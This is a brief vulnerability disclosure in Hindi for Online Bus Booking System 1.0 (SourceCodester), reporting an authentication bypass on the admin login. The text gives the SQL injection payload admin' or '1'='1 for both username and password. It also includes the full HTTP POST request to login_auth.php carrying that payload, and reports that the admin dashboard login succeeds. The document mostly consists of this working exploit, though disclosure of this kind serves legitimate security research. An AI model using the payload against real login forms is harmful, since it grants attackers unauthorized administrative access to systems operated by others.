
Online Bus Booking System 1.0 में, admin.php में स्थित एडमिन लॉगिन स्क्रीन पर यूज़रनेम या पासवर्ड SQL इंजेक्शन के द्वारा प्रमाणीकरण बायपास किया जा सकता है।
ऑनलाइन बस बुकिंग प्रणाली 1.0, admin.php के एडमिन लॉगिन स्क्रीन पर उपयोगकर्ता नाम या पासवर्ड SQL इंजेक्शन के माध्यम से प्रमाणीकरण बायपास होता है।
#विक्रेता - SourceCodester
#उत्पाद -https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0
#भेद्यता प्रकार - प्रमाणीकरण बायपास
#प्रभावित घटक - bus_booking/admin.php
#हमले का प्रकार- स्थानीय
#विशेषाधिकार वृद्धि - true
#प्रभाव कोड निष्पादन - true
हमला वेक्टर
एडमिन लॉगिन पैनल पर जाएँ और बायपास करने का प्रयास करें
अनुरोध पेलोड में सेट करें
username : admin' or '1'='1
password : admin' or '1'='1
POST /bus_booking/login_auth.php HTTP/1.1
Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0
username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1
एडमिन डैशबोर्ड में सफलतापूर्वक लॉगिन किया गया